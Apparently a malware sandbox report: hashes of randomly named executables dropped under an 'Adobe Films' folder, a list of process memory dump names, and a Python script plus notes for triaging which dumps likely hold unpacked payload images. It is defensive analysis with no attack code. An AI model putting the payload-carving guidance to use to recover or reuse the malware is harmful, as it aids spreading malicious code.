SHA256 75e2302c85b1ae000610d9c9eec35a8cafe3f87f8c2e65d972ef1cb70bb3c894
SHA512 fbb3fb9af06b21830d62f5ff63880ee798879f0ec2088827cbc4d57f37a2c08124cce84b1d6d44522d4d02465dfeb3f683abcc937bdaa900da20df1498835b2b
-
C:\Users\Admin\Pictures\Adobe Films\oRqxkgsixdTQLGlCw_wScXlE.exe
MD5 ede30d97b0bd18cffa38faca759f4749
SHA1 58a5eabb98116dcfc849e3cd35a6779cadb0270d
SHA256 0595909dcc2f12a8ce000fc3d113dc618caae5cfeafa7cd2b09cad1ffc5b1a6e
SHA512 5cedc05e57b3a855adbbb8f15b5528f588da39805f3b3a561933523e8b5cab076dae08af24555b75937ba3af3502576f2608d261d4bdfd6199d140a8848036d6
-
C:\Users\Admin\Pictures\Adobe Films\qpVL2ZesZ5Dciz3WyY2qTUz4.exe
MD5 3f22bd82ee1b38f439e6354c60126d6d
SHA1 63b57d818f86ea64ebc8566faeb0c977839defde
SHA256 265c2ddc8a21e6fa8dfaa38ef0e77df8a2e98273a1abfb575aef93c0cc8ee96a
SHA512 b73e8e17e5e99d0e9edfb690ece8b0c15befb4d48b1c4f2fe77c5e3daf01df35858c06e1403a8636f86363708b80123d12122cb821a86b575b184227c760988f
-
memory/340-397-0x0000000000000000-mapping.dmp
-
memory/580-461-0x0000000000A00000-0x0000000000A01000-memory.dmp (Filesize 4KB)
-
memory/720-178-0x0000000000000000-mapping.dmp
-
memory/752-596-0x0000000001790000-0x0000000001792000-memory.dmp (Filesize 8KB)
-
memory/808-218-0x0000000000000000-mapping.dmp
-
memory/1012-146-0x0000000005B30000-0x0000000005C7A000-memory.dmp (Filesize 1.3MB)
-
memory/1040-519-0x00000000052D0000-0x00000000058E8000-memory.dmp (Filesize 6.1MB)
-
memory/1108-618-0x0000000140000000-0x0000000140009000-memory.dmp (Filesize 36KB)
-
memory/1148-359-0x0000000000000000-mapping.dmp
-
memory/1236-632-0x0000000007870000-0x0000000007871000-memory.dmp (Filesize 4KB)
-
memory/1320-193-0x0000000000000000-mapping.dmp
-
memory/1440-406-0x0000000000000000-mapping.dmp
-
memory/1440-479-0x00000000054C0000-0x00000000054C1000-memory.dmp (Filesize 4KB)
-
memory/1540-268-0x000000001CCA0000-0x000000001CD78000-memory.dmp (Filesize 864KB)
-
memory/1540-232-0x000000001D9E0000-0x000000001DB42000-memory.dmp (Filesize 1.4MB)
-
memory/1540-173-0x0000000000F20000-0x0000000000F21000-memory.dmp (Filesize 4KB)
-
memory/1540-150-0x0000000000000000-mapping.dmp
-
memory/1592-379-0x0000000000000000-mapping.dmp
-
memory/1656-401-0x0000000000E50000-0x0000000000E99000-memory.dmp (Filesize 292KB)
-
memory/1656-375-0x0000000000000000-mapping.dmp
-
memory/1672-319-0x00000000059D0000-0x00000000059D1000-memory.dmp (Filesize 4KB)
-
memory/1672-290-0x0000000006000000-0x0000000006001000-memory.dmp (Filesize 4KB)
-
memory/1672-162-0x0000000000000000-mapping.dmp
-
memory/1672-281-0x0000000000130000-0x0000000000131000-memory.dmp (Filesize 4KB)
-
memory/1672-295-0x0000000005A50000-0x0000000005A51000-memory.dmp (Filesize 4KB)
-
memory/1672-328-0x0000000005E00000-0x0000000005E01000-memory.dmp (Filesize 4KB)
-
memory/1720-590-0x0000000000CA0000-0x0000000000CA2000-memory.dmp (Filesize 8KB)
-
memory/1888-154-0x0000000000000000-mapping.dmp
-
memory/1888-170-0x0000000000A59000-0x0000000000AD6000-memory.dmp (Filesize 500KB)
-
memory/1888-209-0x0000000000E80000-0x0000000000F56000-memory.dmp (Filesize 856KB)
-
memory/1896-591-0x0000000000ED0000-0x0000000000ED2000-memory.dmp (Filesize 8KB)
-
memory/1904-155-0x0000000000000000-mapping.dmp
-
memory/1904-456-0x0000000007180000-0x0000000007181000-memory.dmp (Filesize 4KB)
-
memory/1976-360-0x0000000000000000-mapping.dmp
-
memory/1976-169-0x0000000000969000-0x00000000009D2000-memory.dmp (Filesize 420KB)
-
memory/1976-195-0x0000000000E10000-0x0000000000EA3000-memory.dmp (Filesize 588KB)
-
memory/1976-151-0x0000000000000000-mapping.dmp
-
memory/2012-265-0x0000000000000000-mapping.dmp
-
memory/2096-163-0x0000000000000000-mapping.dmp
-
memory/2348-244-0x000000001B740000-0x000000001B742000-memory.dmp (Filesize 8KB)
-
memory/2348-206-0x0000000000B20000-0x0000000000B21000-memory.dmp (Filesize 4KB)
-
memory/2348-203-0x0000000000000000-mapping.dmp
-
memory/2348-224-0x00000000012F0000-0x00000000012F1000-memory.dmp (Filesize 4KB)
-
memory/2372-226-0x0000000000000000-mapping.dmp
-
memory/2372-258-0x0000000000400000-0x000000000046D000-memory.dmp (Filesize 436KB)
-
memory/2420-262-0x00000000007F0000-0x0000000000800000-memory.dmp (Filesize 64KB)
-
memory/2420-263-0x0000000000810000-0x0000000000822000-memory.dmp (Filesize 72KB)
-
memory/2420-250-0x0000000000000000-mapping.dmp
-
memory/2480-604-0x0000000000D22000-0x0000000000D24000-memory.dmp (Filesize 8KB)
-
memory/2480-620-0x0000000000D24000-0x0000000000D25000-memory.dmp (Filesize 4KB)
-
memory/2480-585-0x0000000000D20000-0x0000000000D22000-memory.dmp (Filesize 8KB)
-
memory/2668-382-0x0000000000000000-mapping.dmp
-
memory/2668-505-0x0000000005A00000-0x0000000005A01000-memory.dmp (Filesize 4KB)
-
memory/2704-608-0x00000000014D0000-0x00000000014D2000-memory.dmp (Filesize 8KB)
-
memory/2744-215-0x0000000002FC3000-0x0000000002FE6000-memory.dmp (Filesize 140KB)
-
memory/2744-164-0x0000000000000000-mapping.dmp
-
memory/2744-231-0x0000000002F50000-0x0000000002F80000-memory.dmp (Filesize 192KB)
-
memory/2840-176-0x0000000000000000-mapping.dmp
-
memory/2840-201-0x0000000000B19000-0x0000000000B35000-memory.dmp (Filesize 112KB)
-
memory/2840-220-0x0000000000AC0000-0x0000000000AEF000-memory.dmp (Filesize 188KB)
-
memory/2912-238-0x0000000000E20000-0x0000000000EF6000-memory.dmp (Filesize 856KB)
-
memory/2912-177-0x0000000000000000-mapping.dmp
-
memory/2912-202-0x0000000000AF9000-0x0000000000B76000-memory.dmp (Filesize 500KB)
-
memory/2996-147-0x0000000000000000-mapping.dmp
-
memory/3004-410-0x0000000000920000-0x0000000000929000-memory.dmp (Filesize 36KB)
-
memory/3004-380-0x0000000000000000-mapping.dmp
-
memory/3076-245-0x0000000000400000-0x0000000000409000-memory.dmp (Filesize 36KB)
-
memory/3076-239-0x0000000000000000-mapping.dmp
-
memory/3168-288-0x00000000058B0000-0x00000000058B1000-memory.dmp (Filesize 4KB)
-
memory/3168-253-0x0000000002FE0000-0x0000000002FE1000-memory.dmp (Filesize 4KB)
-
memory/3168-256-0x0000000005720000-0x0000000005721000-memory.dmp (Filesize 4KB)
-
memory/3168-217-0x0000000000B40000-0x0000000000B41000-memory.dmp (Filesize 4KB)
-
memory/3168-312-0x0000000005860000-0x0000000005861000-memory.dmp (Filesize 4KB)
-
memory/3168-292-0x00000000066A0000-0x00000000066A1000-memory.dmp (Filesize 4KB)
-
memory/3168-261-0x0000000005E60000-0x0000000005E61000-memory.dmp (Filesize 4KB)
-
memory/3168-179-0x0000000000000000-mapping.dmp
-
memory/3168-251-0x00000000058A0000-0x00000000058A1000-memory.dmp (Filesize 4KB)
-
memory/3168-277-0x00000000056C0000-0x000000000570C000-memory.dmp (Filesize 304KB)
-
memory/3196-313-0x00000000056C0000-0x00000000056C1000-memory.dmp (Filesize 4KB)
-
memory/3196-306-0x00000000056D0000-0x00000000056D1000-memory.dmp (Filesize 4KB)
-
memory/3196-191-0x0000000000000000-mapping.dmp
-
memory/3196-302-0x00000000058F0000-0x00000000058F1000-memory.dmp (Filesize 4KB)
-
memory/3196-286-0x00000000000D0000-0x00000000000D1000-memory.dmp (Filesize 4KB)
-
memory/3196-298-0x00000000057E0000-0x00000000057E1000-memory.dmp (Filesize 4KB)
-
memory/3212-227-0x0000000140000000-0x0000000140C27000-memory.dmp (Filesize 12.2MB)
-
memory/3212-219-0x0000000140000000-0x0000000140C27000-memory.dmp (Filesize 12.2MB)
-
memory/3212-214-0x0000000140000000-0x0000000140C27000-memory.dmp (Filesize 12.2MB)
-
memory/3212-539-0x0000000140000000-0x0000000140C27000-memory.dmp (Filesize 12.2MB)
-
memory/3212-168-0x0000000000000000-mapping.dmp
-
memory/3232-297-0x00000000048D0000-0x00000000048E6000-memory.dmp (Filesize 88KB)
-
memory/3232-503-0x0000000003090000-0x00000000030A6000-memory.dmp (Filesize 88KB)
-
memory/3324-216-0x0000000000400000-0x0000000002DE8000-memory.dmp (Filesize 41.9MB)
-
memory/3324-211-0x0000000000000000-mapping.dmp
-
memory/3324-317-0x0000000002F87000-0x0000000002FD6000-memory.dmpFilesize
316KB
-
memory/3324-322-0x0000000000400000-0x0000000002DE8000-memory.dmpFilesize
41.9MB
-
memory/3324-330-0x0000000003150000-0x00000000031DE000-memory.dmpFilesize
568KB
-
memory/3376-383-0x0000000000000000-mapping.dmp
-
memory/3376-392-0x0000000000400000-0x000000000046D000-memory.dmpFilesize
436KB
-
memory/3440-171-0x0000000000000000-mapping.dmp
-
memory/3716-453-0x00000242A0140000-0x00000242A0142000-memory.dmpFilesize
8KB
-
memory/3716-459-0x00000242A0143000-0x00000242A0145000-memory.dmpFilesize
8KB
-
memory/3716-622-0x00000242A0148000-0x00000242A014A000-memory.dmpFilesize
8KB
-
memory/3716-415-0x0000000000000000-mapping.dmp
-
memory/3716-541-0x00000242A0146000-0x00000242A0148000-memory.dmpFilesize
8KB
-
memory/3924-374-0x0000000000000000-mapping.dmp
-
memory/4044-185-0x0000000000000000-mapping.dmp
-
memory/4044-549-0x0000000005B90000-0x0000000005B91000-memory.dmpFilesize
4KB
-
memory/4276-234-0x0000000000010000-0x0000000000011000-memory.dmpFilesize
4KB
-
memory/4276-213-0x0000000000000000-mapping.dmp
-
memory/4276-252-0x00000000049B0000-0x00000000049B1000-memory.dmpFilesize
4KB
-
memory/4276-266-0x0000000004950000-0x0000000004951000-memory.dmpFilesize
4KB
-
memory/4276-270-0x0000000004BF0000-0x0000000004BF1000-memory.dmpFilesize
4KB
-
memory/4376-230-0x0000000000000000-mapping.dmp
-
memory/4388-192-0x0000000000000000-mapping.dmp
-
memory/4388-208-0x0000000000BA9000-0x0000000000BBA000-memory.dmpFilesize
68KB
-
memory/4388-223-0x00000000009F0000-0x00000000009F9000-memory.dmpFilesize
36KB
-
memory/4480-427-0x0000000004F40000-0x0000000004F41000-memory.dmpFilesize
4KB
-
memory/4480-385-0x0000000000000000-mapping.dmp
-
memory/4584-246-0x0000000000000000-mapping.dmp
-
memory/4664-376-0x0000000000000000-mapping.dmp
-
memory/4704-264-0x0000000000000000-mapping.dmp
-
memory/4704-280-0x0000000000860000-0x0000000000861000-memory.dmpFilesize
4KB
-
memory/4760-249-0x0000000000880000-0x0000000000881000-memory.dmpFilesize
4KB
-
memory/4760-237-0x0000000000000000-mapping.dmp
-
memory/4760-274-0x000000001B6C0000-0x000000001B6C2000-memory.dmpFilesize
8KB
-
memory/4928-610-0x0000020D78382000-0x0000020D78384000-memory.dmpFilesize
8KB
-
memory/4928-572-0x0000020D78380000-0x0000020D78382000-memory.dmpFilesize
8KB
-
memory/4944-605-0x000001EEC1290000-0x000001EEC1292000-memory.dmpFilesize
8KB
-
memory/4944-634-0x000001EEC1296000-0x000001EEC1298000-memory.dmpFilesize
8KB
-
memory/4944-602-0x000001EEC1293000-0x000001EEC1295000-memory.dmpFilesize
8KB
-
memory/4960-257-0x0000000000000000-mapping.dmp
-
memory/5104-584-0x0000000005C00000-0x0000000005C01000-memory.dmpFilesize
4KB
-
memory/5132-513-0x0000000004D00000-0x0000000004D01000-memory.dmpFilesize
4KB
-
memory/5144-429-0x0000000005E60000-0x0000000005E61000-memory.dmpFilesize
4KB
-
memory/5144-361-0x0000000000000000-mapping.dmp
-
memory/5152-289-0x0000000000000000-mapping.dmp
-
memory/5180-445-0x0000000001980000-0x0000000001982000-memory.dmpFilesize
8KB
-
memory/5224-293-0x0000000000000000-mapping.dmp
-
memory/5244-362-0x0000000000000000-mapping.dmp
-
memory/5308-363-0x0000000000000000-mapping.dmp
-
memory/5380-335-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/5380-334-0x0000000000000000-mapping.dmp
-
memory/5380-345-0x00000000050F0000-0x00000000050F1000-memory.dmpFilesize
4KB
-
memory/5380-340-0x00000000029B0000-0x00000000029B1000-memory.dmpFilesize
4KB
-
memory/5408-309-0x0000000000000000-mapping.dmp
-
memory/5452-338-0x00000000006B0000-0x00000000006B1000-memory.dmpFilesize
4KB
-
memory/5452-314-0x0000000000000000-mapping.dmp
-
memory/5452-367-0x0000000005080000-0x0000000005081000-memory.dmpFilesize
4KB
-
memory/5504-320-0x0000000000000000-mapping.dmp
-
memory/5504-348-0x0000000005C40000-0x0000000005D8A000-memory.dmpFilesize
1.3MB
-
memory/5536-324-0x0000000000000000-mapping.dmp
-
memory/5536-332-0x0000000000D70000-0x0000000000D72000-memory.dmpFilesize
8KB
-
memory/5588-325-0x0000000000000000-mapping.dmp
-
memory/5608-331-0x0000000000A00000-0x0000000000A01000-memory.dmpFilesize
4KB
-
memory/5608-326-0x0000000000000000-mapping.dmp
-
memory/5608-351-0x0000000005450000-0x0000000005451000-memory.dmpFilesize
4KB
-
memory/5608-342-0x0000000005410000-0x0000000005437000-memory.dmpFilesize
156KB
-
memory/5632-327-0x0000000000000000-mapping.dmp
-
memory/5720-587-0x0000000000A20000-0x0000000000A29000-memory.dmpFilesize
36KB
-
memory/5728-600-0x00000000015D0000-0x00000000015D2000-memory.dmpFilesize
8KB
-
memory/5800-391-0x0000000000000000-mapping.dmp
-
memory/5808-390-0x0000000000000000-mapping.dmp
-
memory/5928-341-0x0000000000000000-mapping.dmp
-
memory/5996-411-0x0000000000000000-mapping.dmp
-
memory/6072-402-0x0000000000000000-mapping.dmp
-
memory/6080-422-0x0000000000690000-0x0000000000691000-memory.dmpFilesize
4KB
-
memory/6080-405-0x0000000000000000-mapping.dmp
-
memory/6108-354-0x0000000000000000-mapping.dmp
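The dump names above encode a process ID, a sequence number and the start and end address of each region the sandbox captured, which is enough to decide which dumps to carve first without opening any of them. The script below is an added example, not tooling from the sandbox or from this report: it parses that naming scheme (the layout is inferred from the listing, since no spec is on the page), reproduces the Filesize column from the address range, and flags, per PID, the largest region that starts at a default Microsoft linker image base (0x400000 for 32-bit EXEs, 0x140000000 for 64-bit EXEs), since a region dumped from there is usually a whole PE image rather than a heap or stack fragment. The sample entries are copied from the listing.

```python
import re
from collections import defaultdict

# Name layout inferred from the report listing (assumption; the sandbox publishes no spec):
#   memory/<pid>-<seq>-<start>-<end>-memory.dmp          a dumped region [start, end)
#   memory/<pid>-<seq>-0x0000000000000000-mapping.dmp    a mapping record with no region
DUMP_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-(?P<start>0x[0-9A-Fa-f]+)"
    r"(?:-(?P<end>0x[0-9A-Fa-f]+)-memory\.dmp|-mapping\.dmp)$"
)

# Default image bases the Microsoft linker assigns to 32-bit and 64-bit EXEs.
# A region dumped from one of these is usually a whole PE image (the unpacked
# payload), so it is the first thing worth carving.
DEFAULT_IMAGE_BASES = {0x400000, 0x140000000}

# Constructed sample: a handful of entries copied from the listing above.
SAMPLE_DUMPS = [
    "memory/2372-226-0x0000000000000000-mapping.dmp",
    "memory/2372-258-0x0000000000400000-0x000000000046D000-memory.dmp",
    "memory/2840-220-0x0000000000AC0000-0x0000000000AEF000-memory.dmp",
    "memory/3212-227-0x0000000140000000-0x0000000140C27000-memory.dmp",
    "memory/3212-219-0x0000000140000000-0x0000000140C27000-memory.dmp",
    "memory/3324-216-0x0000000000400000-0x0000000002DE8000-memory.dmp",
    "memory/3324-330-0x0000000003150000-0x00000000031DE000-memory.dmp",
    "memory/5504-348-0x0000000005C40000-0x0000000005D8A000-memory.dmp",
]


def parse_dump_name(name):
    """Split one dump file name into its fields; size is end - start in bytes."""
    m = DUMP_RE.match(name.strip())
    if m is None:
        raise ValueError(f"not a sandbox dump name: {name!r}")
    pid, seq, start = int(m["pid"]), int(m["seq"]), int(m["start"], 16)
    if m["end"] is None:
        return {"pid": pid, "seq": seq, "kind": "mapping", "start": start, "end": None, "size": 0}
    end = int(m["end"], 16)
    if end <= start or (end - start) % 0x1000:
        # Regions are page granular; anything else is a corrupted or hand-edited name.
        raise ValueError(f"bad region bounds in {name!r}")
    return {"pid": pid, "seq": seq, "kind": "memory", "start": start, "end": end, "size": end - start}


def human_size(nbytes):
    """Render a byte count the way the Filesize column does: whole KB below 1 MB, one-decimal MB above."""
    if nbytes < 1 << 20:
        return f"{nbytes >> 10}KB"
    return f"{nbytes / (1 << 20):.1f}MB"


def regions_by_pid(names):
    """Group dumped regions per PID, sorted by start address; mapping records are skipped."""
    out = defaultdict(list)
    for name in names:
        d = parse_dump_name(name)
        if d["kind"] == "memory":
            out[d["pid"]].append(d)
    for regions in out.values():
        regions.sort(key=lambda d: (d["start"], d["seq"]))
    return dict(out)


def image_candidates(names):
    """Per PID, the (start, size) of the largest region dumped at a default image base.
    The same region dumped several times (same bounds, different seq) collapses to one entry."""
    best = {}
    for pid, regions in regions_by_pid(names).items():
        hits = [d for d in regions if d["start"] in DEFAULT_IMAGE_BASES]
        if hits:
            top = max(hits, key=lambda d: d["size"])
            best[pid] = (top["start"], top["size"])
    return best


if __name__ == "__main__":
    for pid, (start, size) in sorted(image_candidates(SAMPLE_DUMPS).items()):
        print(f"pid {pid}: image-base region at {start:#x}, {human_size(size)}")
```

Run against the full listing, the same heuristic singles out PIDs 2372, 3076, 3324, 3376 and 5380 (32-bit image base) and 3212 (64-bit image base); the 41.9MB region in 3324 and the 12.2MB one in 3212 are far larger than the 403KB sample and are the obvious places to look for unpacked code. A region at a default image base is only a hint: ASLR-enabled images are relocated, and a packer can map its payload anywhere, so a PE header check on the dump itself is still needed.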